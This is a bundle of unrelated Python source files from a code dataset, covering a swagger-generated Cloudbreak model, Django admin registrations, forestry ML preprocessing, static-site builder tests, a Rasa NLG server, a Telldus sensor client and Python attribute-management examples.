88147 | <gh_stars>0
# coding: utf-8
"""
Cloudbreak API
Cloudbreak is a powerful left surf that breaks over a coral reef, a mile off southwest the island of Tavarua, Fiji. Cloudbreak is a cloud agnostic Hadoop as a Service API. Abstracts the provisioning and ease management and monitoring of on-demand clusters. SequenceIQ's Cloudbreak is a RESTful application development platform with the goal of helping developers to build solutions for deploying Hadoop YARN clusters in different environments. Once it is deployed in your favourite servlet container it exposes a REST API allowing to span up Hadoop clusters of arbitary sizes and cloud providers. Provisioning Hadoop has never been easier. Cloudbreak is built on the foundation of cloud providers API (Amazon AWS, Microsoft Azure, Google Cloud Platform, Openstack), Apache Ambari, Docker lightweight containers, Swarm and Consul. For further product documentation follow the link: <a href=\"http://hortonworks.com/apache/cloudbreak/\">http://hortonworks.com/apache/cloudbreak/</a>
OpenAPI spec version: 2.7.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class FlexUsageControllerJson(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'guid': 'str',
'instance_id': 'str',
'region': 'str',
'provider': 'str',
'smart_sense_id': 'str',
'user_name': 'str'
}
attribute_map = {
'guid': 'guid',
'instance_id': 'instanceId',
'region': 'region',
'provider': 'provider',
'smart_sense_id': 'smartSenseId',
'user_name': 'userName'
}
def __init__(self, guid=None, instance_id=None, region=None, provider=None, smart_sense_id=None, user_name=None):
"""
FlexUsageControllerJson - a model defined in Swagger
"""
self._guid = None
self._instance_id = None
self._region = None
self._provider = None
self._smart_sense_id = None
self._user_name = None
if guid is not None:
self.guid = guid
if instance_id is not None:
self.instance_id = instance_id
if region is not None:
self.region = region
if provider is not None:
self.provider = provider
if smart_sense_id is not None:
self.smart_sense_id = smart_sense_id
if user_name is not None:
self.user_name = user_name
@property
def guid(self):
"""
Gets the guid of this FlexUsageControllerJson.
:return: The guid of this FlexUsageControllerJson.
:rtype: str
"""
return self._guid
@guid.setter
def guid(self, guid):
"""
Sets the guid of this FlexUsageControllerJson.
:param guid: The guid of this FlexUsageControllerJson.
:type: str
"""
self._guid = guid
@property
def instance_id(self):
"""
Gets the instance_id of this FlexUsageControllerJson.
:return: The instance_id of this FlexUsageControllerJson.
:rtype: str
"""
return self._instance_id
@instance_id.setter
def instance_id(self, instance_id):
"""
Sets the instance_id of this FlexUsageControllerJson.
:param instance_id: The instance_id of this FlexUsageControllerJson.
:type: str
"""
self._instance_id = instance_id
@property
def region(self):
"""
Gets the region of this FlexUsageControllerJson.
:return: The region of this FlexUsageControllerJson.
:rtype: str
"""
return self._region
@region.setter
def region(self, region):
"""
Sets the region of this FlexUsageControllerJson.
:param region: The region of this FlexUsageControllerJson.
:type: str
"""
self._region = region
@property
def provider(self):
"""
Gets the provider of this FlexUsageControllerJson.
:return: The provider of this FlexUsageControllerJson.
:rtype: str
"""
return self._provider
@provider.setter
def provider(self, provider):
"""
Sets the provider of this FlexUsageControllerJson.
:param provider: The provider of this FlexUsageControllerJson.
:type: str
"""
self._provider = provider
@property
def smart_sense_id(self):
"""
Gets the smart_sense_id of this FlexUsageControllerJson.
:return: The smart_sense_id of this FlexUsageControllerJson.
:rtype: str
"""
return self._smart_sense_id
@smart_sense_id.setter
def smart_sense_id(self, smart_sense_id):
"""
Sets the smart_sense_id of this FlexUsageControllerJson.
:param smart_sense_id: The smart_sense_id of this FlexUsageControllerJson.
:type: str
"""
self._smart_sense_id = smart_sense_id
@property
def user_name(self):
"""
Gets the user_name of this FlexUsageControllerJson.
:return: The user_name of this FlexUsageControllerJson.
:rtype: str
"""
return self._user_name
@user_name.setter
def user_name(self, user_name):
"""
Sets the user_name of this FlexUsageControllerJson.
:param user_name: The user_name of this FlexUsageControllerJson.
:type: str
"""
self._user_name = user_name
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, FlexUsageControllerJson):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| StarcoderdataPython |
1778776 | <reponame>p01arst0rm/twelete
__version__ = '1.1.0'
__author__ = 'polar'
__license__ = 'MIT'
from Twelete.main import twelete
| StarcoderdataPython |
3293975 | from django.contrib import admin
from .models import FirstAnswerReview,FirstQuestionReview
from .models import LateAnswerReview
# from .models import QuestionEdit
from .models import CloseQuestionVotes, ReviewQuestionReOpenVotes
from .models import ReviewCloseVotes,ReOpenQuestionVotes,QuestionEditVotes
from .models import ReviewQuestionEdit,LowQualityPostsCheck,ReviewLowQualityPosts
from .models import ReviewFlagPost,FlagComment,ReviewFlagComment,FlagPost
# admin.site.register(QuestionEdit)
admin.site.register(FirstAnswerReview)
admin.site.register(FirstQuestionReview)
admin.site.register(LateAnswerReview)
admin.site.register(CloseQuestionVotes)
admin.site.register(ReviewCloseVotes)
admin.site.register(ReOpenQuestionVotes)
admin.site.register(ReviewQuestionReOpenVotes)
admin.site.register(QuestionEditVotes)
admin.site.register(ReviewQuestionEdit)
admin.site.register(LowQualityPostsCheck)
admin.site.register(ReviewLowQualityPosts)
admin.site.register(FlagComment)
admin.site.register(ReviewFlagPost)
admin.site.register(ReviewFlagComment)
admin.site.register(FlagPost) | StarcoderdataPython |
1657034 | <reponame>claresloggett/ponder-gittest
'''
Utilities for testing.
'''
import pandas as pd
def parse_test_df(f):
'''
Given a filehandle or filename for a CSV file,
return the dataframe, assuming our standard dtypes
for standard column names.
'''
df = pd.read_csv(f)
df['Boolean'] = df['Boolean'].astype('bool')
df['Binary'] = pd.Categorical(df['Binary'], categories=['No','Yes'])
df['Ordinal'] = pd.Categorical(df['Ordinal'],
categories=['Small','Medium','Large'], ordered=True)
df['Nominal'] = pd.Categorical(df['Nominal'],
categories=['Red','Yellow','Green'])
df['Nominal2'] = pd.Categorical(df['Nominal2'],
categories=['Negative','PositiveA','PositiveB'])
return df
| StarcoderdataPython |
3248886 | <gh_stars>0
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/02_tabular.preprocessing.ipynb (unless otherwise specified).
__all__ = ['EnvecoPreprocessor', 'process_one']
# Cell
from fastai.tabular.all import *
from fastai.data.all import *
from fastai.vision.data import get_grid
from ..data.las import *
from ..data.image import *
import matplotlib.patches as mpl_patches
from typing import Tuple
from fastai.metrics import *
# Cell
from tqdm import tqdm
tqdm.pandas()
class EnvecoPreprocessor():
"Needs a bit refactoring"
def __init__(self, train_path, valid_path, test_path, **kwargs):
self.train_df = pd.read_csv(train_path)
self.train_df = self.train_df.rename(columns = lambda x: re.sub('[\.]+', '_', x))
self.valid_df = pd.read_csv(valid_path)
self.valid_df = self.valid_df.rename(columns = lambda x: re.sub('[\.]+', '_', x))
self.test_df = pd.read_csv(test_path)
self.test_df = self.test_df.rename(columns = lambda x: re.sub('[\.]+', '_', x))
self.train_df['is_valid'] = 0
self.valid_df['is_valid'] = 1
self.train_val_df = pd.concat((self.train_df, self.valid_df))
def preprocess_lidar(self, target_col, path, min_h:float=1.5, mask_plot:bool=True, normalize:bool=True,
log_y:bool=False, save_path:str=None) -> Tuple[TabularPandas, TabularPandas]:
"Preprocess data and return (train_val, test) -tuple. Optionally log-transform target column with np.log1p"
trainval = self.train_val_df.copy()
test = self.test_df.copy()
feature_cols = point_cloud_metric_cols
trainval[point_cloud_metric_cols] = trainval.progress_apply(lambda row: point_cloud_metrics(f'{path}/{row.sampleplotid}.las',
row.x, row.y,
min_h=min_h,
mask_plot=mask_plot),
axis=1, result_type='expand')
test[point_cloud_metric_cols] = test.progress_apply(lambda row: point_cloud_metrics(f'{path}/{row.sampleplotid}.las',
row.x, row.y,
min_h=min_h,
mask_plot=mask_plot),
axis=1, result_type='expand')
if log_y:
trainval[target_col] = np.log1p(trainval[target_col])
test[target_col] = np.log1p(test[target_col])
procs = None
if normalize:
procs = [Normalize]#.from_stats(*norm_stats)]
trainval_tb = TabularPandas(trainval, procs=procs,
cont_names=feature_cols, y_names=target_col,
splits=ColSplitter(col='is_valid')(trainval))
test_tb = TabularPandas(test, procs=procs,
cont_names=feature_cols, y_names=target_col)
if save_path:
trainval.to_csv(f'{save_path}/las_trainval.csv', index=False)
test.to_csv(f'{save_path}/las_test.csv', index=False)
with open(f'{save_path}/las_features.txt', 'w') as f:
f.writelines("%s\n" % c for c in feature_cols)
return trainval_tb, test_tb
def load_las(self, path, target_col, normalize:bool=True, log_y:bool=False) -> Tuple[TabularPandas, TabularPandas]:
"Load previously preprocessed las data"
trainval = pd.read_csv(f'{path}/las_trainval.csv')
test = pd.read_csv(f'{path}/las_test.csv')
with open(f'{path}/las_features.txt', 'r') as f:
feature_cols = [c.rstrip() for c in f.readlines()]
if log_y:
trainval[target_col] = np.log1p(trainval[target_col])
test[target_col] = np.log1p(test[target_col])
procs = None
if normalize:
procs = [Normalize]#.from_stats(*norm_stats)]
trainval_tb = TabularPandas(trainval, procs=procs,
cont_names=feature_cols, y_names=target_col,
splits=ColSplitter(col='is_valid')(trainval))
test_tb = TabularPandas(test, procs=procs,
cont_names=feature_cols, y_names=target_col)
return trainval_tb, test_tb
def preprocess_image(self, target_col, path, radius:int=31, mask_plot:bool=True, normalize:bool=True,
log_y:bool=False, save_path:str=None) -> Tuple[TabularPandas, TabularPandas]:
"Preprocess dataframes and return (train_val, test) -tuple"
trainval = self.train_val_df.copy()
test = self.test_df.copy()
#feature_cols = image_metric_cols
trainval_feats = []
for s in tqdm(trainval.sampleplotid.unique()):
feats = process_image_features(f'{path}/{s}.tif', mask_plot, radius)
feats['sampleplotid'] = s
trainval_feats.append(feats)
trainval_feats = pd.DataFrame(trainval_feats)
test_feats = []
for s in tqdm(test.sampleplotid.unique()):
feats = process_image_features(f'{path}/{s}.tif', mask_plot, radius)
feats['sampleplotid'] = s
test_feats.append(feats)
test_feats = pd.DataFrame(test_feats)
trainval = trainval.merge(trainval_feats, on='sampleplotid', how='left')
test = test.merge(test_feats, on='sampleplotid', how='left')
if log_y:
trainval[target_col] = np.log1p(trainval[target_col])
test[target_col] = np.log1p(test[target_col])
procs = None
if normalize:
procs = [Normalize]#.from_stats(*norm_stats)]
feature_cols = [k for k in trainval_feats.columns if k != 'sampleplotid']
trainval_tb = TabularPandas(trainval, procs=procs,
cont_names=feature_cols, y_names=target_col,
splits=ColSplitter(col='is_valid')(trainval))
test_tb = TabularPandas(test, procs=procs,
cont_names=feature_cols, y_names=target_col)
if save_path:
trainval.to_csv(f'{save_path}/image_trainval.csv', index=False)
test.to_csv(f'{save_path}/image_test.csv', index=False)
with open(f'{save_path}/image_features.txt', 'w') as f:
f.writelines("%s\n" % c for c in feature_cols)
return trainval_tb, test_tb
def load_image(self, path, target_col, normalize:bool=True, log_y:bool=False) -> Tuple[TabularPandas, TabularPandas]:
"Load previously preprocessed image data"
trainval = pd.read_csv(f'{path}/image_trainval.csv')
test = pd.read_csv(f'{path}/image_test.csv')
with open(f'{path}/image_features.txt', 'r') as f:
feature_cols = [c.rstrip() for c in f.readlines()]
if log_y:
trainval[target_col] = np.log1p(trainval[target_col])
test[target_col] = np.log1p(test[target_col])
procs = None
if normalize:
procs = [Normalize]#.from_stats(*norm_stats)]
trainval_tb = TabularPandas(trainval, procs=procs,
cont_names=feature_cols, y_names=target_col,
splits=ColSplitter(col='is_valid')(trainval))
test_tb = TabularPandas(test, procs=procs,
cont_names=feature_cols, y_names=target_col)
return trainval_tb, test_tb
def preprocess(self, target_col, path, lidar_pref, image_pref, min_h:float=1.5,
mask_plot:bool=True, normalize:bool=True, log_y:bool=False,
save_path:str=None) -> Tuple[TabularPandas, TabularPandas]:
"Preprocess dataframes and return (train_val, test) -tuple"
trainval = self.train_val_df.copy()
test = self.test_df.copy()
feature_cols = point_cloud_metric_cols
trainval[point_cloud_metric_cols] = trainval.progress_apply(lambda row: point_cloud_metrics(f'{path}/{lidar_pref}/{row.sampleplotid}.las',
row.x, row.y,
min_h=min_h,
mask_plot=mask_plot),
axis=1, result_type='expand')
test[point_cloud_metric_cols] = test.progress_apply(lambda row: point_cloud_metrics(f'{path}/{lidar_pref}/{row.sampleplotid}.las',
row.x, row.y,
min_h=min_h,
mask_plot=mask_plot),
axis=1, result_type='expand')
trainval_feats = []
for s in tqdm(trainval.sampleplotid.unique()):
feats = process_image_features(f'{path}/{image_pref}/{s}.tif', mask_plot, radius=31)
feats['sampleplotid'] = s
trainval_feats.append(feats)
trainval_feats = pd.DataFrame(trainval_feats)
test_feats = []
for s in tqdm(test.sampleplotid.unique()):
feats = process_image_features(f'{path}/{image_pref}/{s}.tif', mask_plot, radius=31)
feats['sampleplotid'] = s
test_feats.append(feats)
test_feats = pd.DataFrame(test_feats)
trainval = trainval.merge(trainval_feats, on='sampleplotid', how='left')
test = test.merge(test_feats, on='sampleplotid', how='left')
feature_cols = feature_cols + [c for c in trainval_feats.columns if c != 'sampleplotid']
if log_y:
trainval[target_col] = np.log1p(trainval[target_col])
test[target_col] = np.log1p(test[target_col])
procs = None
if normalize:
procs = [Normalize]#.from_stats(*norm_stats)]
trainval_tb = TabularPandas(trainval, procs=procs,
cont_names=feature_cols, y_names=target_col,
splits=ColSplitter(col='is_valid')(trainval))
test_tb = TabularPandas(test, procs=procs,
cont_names=feature_cols, y_names=target_col)
if save_path:
trainval.to_csv(f'{save_path}/las_image_trainval.csv', index=False)
test.to_csv(f'{save_path}/las_image_test.csv', index=False)
with open(f'{save_path}/las_image_features.txt', 'w') as f:
f.writelines("%s\n" % c for c in feature_cols)
return trainval_tb, test_tb
def load_las_image(self, path, target_col, normalize:bool=True, log_y:bool=False) -> Tuple[TabularPandas, TabularPandas]:
"Load previously preprocessed image data"
trainval = pd.read_csv(f'{path}/las_image_trainval.csv')
test = pd.read_csv(f'{path}/las_image_test.csv')
with open(f'{path}/las_image_features.txt', 'r') as f:
feature_cols = [c.rstrip() for c in f.readlines()]
if log_y:
trainval[target_col] = np.log1p(trainval[target_col])
test[target_col] = np.log1p(test[target_col])
procs = None
if normalize:
procs = [Normalize]#.from_stats(*norm_stats)]
trainval_tb = TabularPandas(trainval, procs=procs,
cont_names=feature_cols, y_names=target_col,
splits=ColSplitter(col='is_valid')(trainval))
test_tb = TabularPandas(test, procs=procs,
cont_names=feature_cols, y_names=target_col)
return trainval_tb, test_tb
# Cell
def process_one(path, plot_x:float=None, plot_y:float=None, mask_plot=True, radius=9) -> pd.Series:
"Utility for predicting single point cloud"
metrics = point_cloud_metrics(path, plot_x, plot_y, mask_plot, radius)
df = pd.DataFrame(columns=point_cloud_metric_cols, data=[metrics])
return df.iloc[0] | StarcoderdataPython |
160486 | <filename>tests/0800_builder/06_build.py
import io
import importlib
import os
import shutil
import pytest
from optimus.setup_project import setup_project
from optimus.conf.loader import import_pages_module
from optimus.pages.builder import PageBuilder
from optimus.assets.registry import register_assets
def DummyFilter(content):
return "DummyFilter: {}".format(content)
@pytest.mark.parametrize(
"sample_fixture_name,attempted_destinations",
[
(
"basic_template",
# Relative destination path from dev build dir
[
"index.html",
],
),
(
"basic2_template",
[
"index.html",
"sub/foo.html",
"sub/bar.html",
],
),
(
"i18n_template",
[
"index.html",
"index_fr_FR.html",
],
),
],
)
def test_build_item(
minimal_basic_settings,
fixtures_settings,
reset_syspath,
temp_builds_dir,
sample_fixture_name,
attempted_destinations,
):
"""
Build each page
This will only works for sample fixtures that use the same as
'basic_template'.
Also we build in production mode so webassets apply minification, this is
required since in development mode webassets use a hash on every asset
file that we can't rely on and would break builded file comparaison
"""
basepath = temp_builds_dir.join("builder_build_item_{}".format(sample_fixture_name))
projectdir = os.path.join(basepath.strpath, sample_fixture_name)
attempts_dir = os.path.join(
fixtures_settings.fixtures_path, "builds", sample_fixture_name
)
# Copy sample from fixtures dir
templatedir = os.path.join(fixtures_settings.fixtures_path, sample_fixture_name)
shutil.copytree(templatedir, projectdir)
# Setup project
setup_project(projectdir, "dummy_value")
# Get basic sample settings
settings = minimal_basic_settings(projectdir)
# Enabled production mode for webassets without url expire in a custom
# cache dir, so we have stable asset filename for comparaison
cache_dir = os.path.join(projectdir, "webassets-cache")
os.makedirs(cache_dir)
settings.DEBUG = False
settings.WEBASSETS_CACHE = cache_dir
settings.WEBASSETS_URLEXPIRE = False
# Define a dummy filter to test filter registration and usage
settings.JINJA_FILTERS = {"dummy_filter": DummyFilter}
# Init webassets and builder
assets_env = register_assets(settings)
builder = PageBuilder(settings, assets_env=assets_env)
pages_map = import_pages_module(settings.PAGES_MAP, basedir=projectdir)
# NOTE: We need to force reloading importation else the previous import settings
# with different values, is still re-used
pages_map = importlib.reload(pages_map)
# Collect finded templates for each defined page view
buildeds = []
for pageview in pages_map.PAGES:
found = builder.build_item(pageview)
buildeds.append(found)
# Add absolute build dir to each attempted relative path
assert buildeds == [
os.path.join(settings.PUBLISH_DIR, path) for path in attempted_destinations
]
# Check every builded destination exists
for path in attempted_destinations:
dest_path = os.path.join(settings.PUBLISH_DIR, path)
attempt_path = os.path.join(attempts_dir, path)
# Open builded file
with io.open(dest_path, "r") as destfp:
built = destfp.read()
# Write attempted file from builded file
# This is only temporary stuff to enable when writing new test or
# updating existing one
# with io.open(attempt_path, 'w') as writefp:
# writefp.write(built)
# Open attempted file from 'builds'
with io.open(attempt_path, "r") as attemptfp:
attempted = attemptfp.read()
assert built == attempted
# Cleanup sys.path for next tests
reset_syspath(projectdir)
@pytest.mark.parametrize(
"sample_fixture_name,attempted_destinations",
[
(
"basic_template",
# Relative destination path from dev build dir
[
"index.html",
],
),
(
"basic2_template",
[
"index.html",
"sub/foo.html",
"sub/bar.html",
],
),
(
"i18n_template",
[
"index.html",
"index_fr_FR.html",
],
),
],
)
def test_build_bulk(
minimal_basic_settings,
fixtures_settings,
reset_syspath,
temp_builds_dir,
sample_fixture_name,
attempted_destinations,
):
"""
Build all pages in one bulk action
Since 'build_item' test allready compare builded file, we dont do it again
here, just check returned paths
"""
basepath = temp_builds_dir.join("builder_build_bulk_{}".format(sample_fixture_name))
projectdir = os.path.join(basepath.strpath, sample_fixture_name)
# Copy sample from fixtures dir
templatedir = os.path.join(fixtures_settings.fixtures_path, sample_fixture_name)
shutil.copytree(templatedir, projectdir)
# Setup project
setup_project(projectdir, "dummy_value")
# Get basic sample settings
settings = minimal_basic_settings(projectdir)
# Define a dummy filter to test filter registration and usage
settings.JINJA_FILTERS = {"dummy_filter": DummyFilter}
# Init webassets and builder
assets_env = register_assets(settings)
builder = PageBuilder(settings, assets_env=assets_env)
pages_map = import_pages_module(settings.PAGES_MAP, basedir=projectdir)
# NOTE: We need to force reloading importation else the previous import settings
# with different values, is still re-used
pages_map = importlib.reload(pages_map)
# Collect finded templates for each defined page view
buildeds = builder.build_bulk(pages_map.PAGES)
# Check every attempted file has been created (promise)
assert buildeds == [
os.path.join(settings.PUBLISH_DIR, path) for path in attempted_destinations
]
# Check promised builded file exists
for dest in attempted_destinations:
absdest = os.path.join(settings.PUBLISH_DIR, dest)
assert os.path.exists(absdest) is True
# Cleanup sys.path for next tests
reset_syspath(projectdir)
| StarcoderdataPython |
3215981 | import argparse
import os
from decouple import config
from rasa.core.nlg import TemplatedNaturalLanguageGenerator, NaturalLanguageGenerator
from rasa.utils.endpoints import EndpointConfig
from sanic import Sanic, response
from rasa.constants import ENV_SANIC_BACKLOG, DEFAULT_SANIC_WORKERS
import logging
from rasa.shared.core.domain import Domain
from rasa.shared.core.trackers import DialogueStateTracker
import file_watcher
logger = logging.getLogger(__name__)
logging.basicConfig(
format='%(asctime)s %(levelname)-8s %(message)s',
level=logging.INFO,
datefmt='%Y-%m-%d %H:%M:%S'
)
DEFAULT_SERVER_PORT = 5065
RASA_ENVIRONMENT = config("RASA_ENVIRONMENT", default="DEV")
class NlgServer:
def __init__(
self,
domain_path="./data",
port=DEFAULT_SERVER_PORT,
workers=1,
nlg_class=TemplatedNaturalLanguageGenerator
):
self.domain_path = domain_path
self.domain = self._get_domain()
if isinstance(nlg_class, str):
self.nlg_class = NaturalLanguageGenerator.create(EndpointConfig(type=nlg_class), self.domain)
else:
self.nlg_class = nlg_class(self.domain.responses)
self.port = port
self.workers = workers
if RASA_ENVIRONMENT == "DEV":
file_watcher.start(self)
def _get_domain(self):
logger.info("Starting to load domain")
try:
domain = Domain.load(self.domain_path)
logger.info(f"Successfully loaded domain with {len(domain.responses)} responses")
except Exception as e:
domain = Domain.empty()
logger.error(e)
return domain
def load_domain(self, debug_mode=None):
try:
self.domain = self._get_domain()
self.nlg_class.responses = self.domain.responses
except Exception as e:
logger.error(e)
debug_dict = {
"text": f"Loaded {len(self.nlg_class.responses)} responses",
"domain_path": self.domain_path
}
if debug_mode == "title":
debug_dict["responses"] = list(self.domain.responses.keys())
elif debug_mode == "full":
debug_dict["responses"] = self.domain.responses
return debug_dict
async def generate_response(self, nlg_call):
kwargs = nlg_call.get("arguments", {})
response_arg = nlg_call.get("response")
sender_id = nlg_call.get("tracker", {}).get("sender_id")
events = nlg_call.get("tracker", {}).get("events")
tracker = DialogueStateTracker.from_dict(sender_id, events, self.domain.slots)
channel_name = nlg_call.get("channel").get("name")
return await self.nlg_class.generate(response_arg, tracker, channel_name, **kwargs)
def run_server(self):
app = Sanic(__name__)
@app.route("/nlg", methods=["POST"])
async def nlg(request):
nlg_call = request.json
bot_response = await self.generate_response(nlg_call)
return response.json(bot_response)
if RASA_ENVIRONMENT == "DEV":
@app.route("/reload", methods=["GET"])
async def reload(request):
debug_response = self.load_domain(request.args.get("show_responses"))
return response.json(debug_response)
app.run(
host="0.0.0.0",
port=self.port,
workers=self.workers,
backlog=int(os.environ.get(ENV_SANIC_BACKLOG, "100")),
)
def create_argument_parser():
parser = argparse.ArgumentParser(description="starts the nlg endpoint")
parser.add_argument(
"-p",
"--port",
default=DEFAULT_SERVER_PORT,
type=int,
help="port to run the server at",
)
parser.add_argument(
"-w",
"--workers",
default=DEFAULT_SANIC_WORKERS,
type=int,
help="Number of processes to spin up",
)
parser.add_argument(
"-d",
"--domain",
type=str,
default="./data",
help="path of the domain file to load utterances from",
)
parser.add_argument(
"--nlg",
type=str,
default=TemplatedNaturalLanguageGenerator,
help="custom nlg class path",
)
return parser
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
arg_parser = create_argument_parser()
cmdline_args = arg_parser.parse_args()
NlgServer(
cmdline_args.domain,
cmdline_args.port,
cmdline_args.workers,
cmdline_args.nlg
).run_server()
| StarcoderdataPython |
3295373 | <filename>easy/Merge Sorted Array/solution.py
# Time complexity: O(m+n)
# Approach: Imputing values from end
class Solution:
def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:
"""
Do not return anything, modify nums1 in-place instead.
"""
if not n:
return
i, j, k = m-1, n-1, m+n-1
while j>=0:
if i>=0 and nums1[i]>nums2[j]:
nums1[k] = nums1[i]
i-=1
else:
nums1[k] = nums2[j]
j-=1
k-=1
| StarcoderdataPython |
1604201 | <gh_stars>0
import json
import os
from datetime import datetime
from requests_oauthlib import OAuth1Session
# Set up OAuth against Telldus Live API
telldus_oauth1_session = os.environ.get('TELLDUS_OAUTH1_SESSION')
telldus_client_secret = os.environ.get('TELLDUS_CLIENT_SECRET')
telldus_resource_owner_key = os.environ.get('TELLDUS_RESOURCE_OWNER_KEY')
telldus_resource_owner_secret = os.environ.get('TELLDUS_RESOURCE_OWNER_SECRET')
telldus_user = OAuth1Session(telldus_oauth1_session,
client_secret=telldus_client_secret,
resource_owner_key=telldus_resource_owner_key,
resource_owner_secret=telldus_resource_owner_secret)
# Base URL for the API
base_url = "https://api.telldus.com/json"
'''
SensorObject with default data in case of empty or invalid response.
Note that last_updated-values of all sorts are a Unix timestamp and might
need some adjusting to display correct values.
'''
class SensorObject():
sensor_id: str
client_name: str
name: str
last_updated: datetime
ignored: bool
editable: bool
temp_value: float
temp_last_updated: datetime
temp_max_value: float
temp_max_time: datetime
temp_min_value: float
temp_min_time: datetime
humidity_value: float
humidity_last_updated: datetime
humidity_max_value: float
humidity_max_time: datetime
humidity_min_value: float
humidity_min_time: datetime
timezone_offset: int
'''
Function for collecting a list of sensors connected to your Telldus account and fetch latest available information from them.
This function returns a list of SensorObjects to the user.
'''
# TODO: Add error handling and clean up code
def fetch_sensor_list(return_raw=False, return_list=False):
telldus_url = f'{base_url}/sensors/list'
telldus_call = telldus_user.get(telldus_url)
result = json.loads(telldus_call.text)
sensor_list = []
if (return_list):
for res in result['sensor']:
sensor_list.append({
'sensor_id': res['id'],
'sensor_name': res['name'],
'sensor_lastupdate': res['lastUpdated'],
'sensor_model': res['model']
})
else:
for res in result['sensor']:
if (return_raw):
sensor_list.append(fetch_sensor_data(res['id'], True))
else:
sensor_list.append(fetch_sensor_data(res['id']))
return sensor_list
'''
Function for collecting the latest available information from a specified Telldus sensor ID.
Returns a SensorObject containing the information to the user
'''
# TODO: Add error handling and clean up code
def fetch_sensor_data(sensor_id, return_raw=False):
telldus_url = f'{base_url}/sensor/info?id={sensor_id}'
telldus_call = telldus_user.get(telldus_url)
json_data = json.loads(telldus_call.text)
if json_data:
result = SensorObject()
result.sensor_id = json_data['id']
result.name = json_data['name']
result.client_name = json_data['clientName']
result.last_updated = json_data['lastUpdated'] if return_raw else datetime.fromtimestamp(
int(json_data['lastUpdated']))
try:
if json_data['data'][0]['name'] == 'temp':
# Handle temperature values
result.temp_value = float(json_data['data'][0]['value'])
result.temp_max_value = float(json_data['data'][0]['max'])
result.temp_min_value = float(json_data['data'][0]['min'])
# Handle datetime values
if (return_raw):
result.temp_last_updated = json_data['data'][0]['lastUpdated']
result.temp_max_time = json_data['data'][0]['maxTime']
result.temp_min_time = json_data['data'][0]['minTime']
else:
result.templast_updated = datetime.fromtimestamp(
int(json_data['data'][0]['lastUpdated']))
result.temp_max_time = datetime.fromtimestamp(
int(json_data['data'][0]['maxTime']))
result.temp_min_time = datetime.fromtimestamp(
int(json_data['data'][0]['minTime']))
except Exception:
pass
try:
if json_data['data'][1]['name'] == 'humidity':
# Handle humidity values
result.humidity_value = int(json_data['data'][1]['value'])
result.humidity_max_value = int(json_data['data'][1]['max'])
result.humidity_min_value = int(json_data['data'][1]['min'])
# Handle datetime values
if (return_raw):
result.humidity_last_updated = json_data['data'][1]['lastUpdated']
result.humidity_max_time = json_data['data'][1]['maxTime']
result.humidity_min_time = json_data['data'][1]['minTime']
else:
result.humidity_last_updated = datetime.fromtimestamp(
int(json_data['data'][1]['lastUpdated']))
result.humidity_max_time = datetime.fromtimestamp(
int(json_data['data'][1]['maxTime']))
result.humidity_min_time = datetime.fromtimestamp(
int(json_data['data'][1]['minTime']))
except Exception:
pass
result.timezone_offset = json_data['timezoneoffset']
else:
result = SensorObject()
return result
"""
A function for fetching sensor history stored at Telldus
"""
def fetch_sensor_history(sensor_id):
try:
telldus_url = f'{base_url}/sensor/history?id={sensor_id}'
telldus_call = telldus_user.get(telldus_url)
return json.loads(telldus_call.text)
except Exception:
return {'error': 'Error while fetching data.'}
| StarcoderdataPython |
1619027 | <gh_stars>0
# 管理技术的比较
"""
注意
def __getattribute__(self, name):
x = object.__getattribute__(self, 'other')
def __setattr__(self, name, value):
self.__dict__['other'] = value
def __setattr__(self, name, value):
object.__setattr__(self, 'other', value)
"""
# property描述符实现
class Powers:
def __init__(self, square, cube):
self._square = square
self._cube = cube
def getSuqre(self):
return self._square ** 2
def setSquare(self, value):
self._square = value
square = property(getSuqre, setSquare)
def getCube(self):
return self._cube ** 3
cube = property(getCube)
X = Powers(3, 4)
print(X.square)
print(X.cube)
X.square = 5
print(X.square)
print("*" * 40)
# 描述符实现,描述符把基础值存储为实例状态,因此,它们必须再次使用下划线开头,以便不会与描述符的名称冲突
class DescSquare:
def __get__(self, instance, owner):
return instance._square ** 2
def __set__(self, instance, value):
instance._square = value
class DescCube:
def __get__(self, instance, owner):
return instance._cube ** 3
class Powers1:
square = DescSquare()
cube = DescCube()
def __init__(self, square, cube):
self._square = square
self._cube = cube
X = Powers1(3, 4)
print(X.square)
print(X.cube)
X.square = 5
print(X.square)
print("*" * 40)
# 使用__getattr__和__setattr__
class Powers2:
def __init__(self, square, cube):
self._square = square
self._cube = cube
def __getattr__(self, name):
if name == "square":
return self._square ** 2
elif name == "cube":
return self._cube ** 3
else:
raise TypeError
# 对被管理的名称访问是未定义的,并且由此调用我们的方法。我们还需要编写 一个__setattrr__来拦截赋值,并且注意避免其潜在的循环:
def __setattr__(self, name, value):
if name == "square":
self.__dict__["_square"] = value
else:
self.__dict__[name] = value
X = Powers2(3, 4)
print(X.square)
print(X.cube)
X.square = 5
print(X.square)
print("*" * 40)
class Powers3:
def __init__(self, square, cube):
self._square = square
self._cube = cube
def __getattribute__(self, name):
if name == "square":
return object.__getattribute__(self, "_square") ** 2
elif name == "cube":
return object.__getattribute__(self, "_cube") ** 3
else:
return object.__getattribute__(self, name)
def __setattr__(self, name, value):
if name == "square":
self.__dict__["_square"] = value
else:
self.__dict__[name] = value
X = Powers3(3, 4)
print(X.square)
print(X.cube)
X.square = 5
print(X.square)
| StarcoderdataPython |
196397 | """Predict with the most-common-label algorithm."""
import argparse
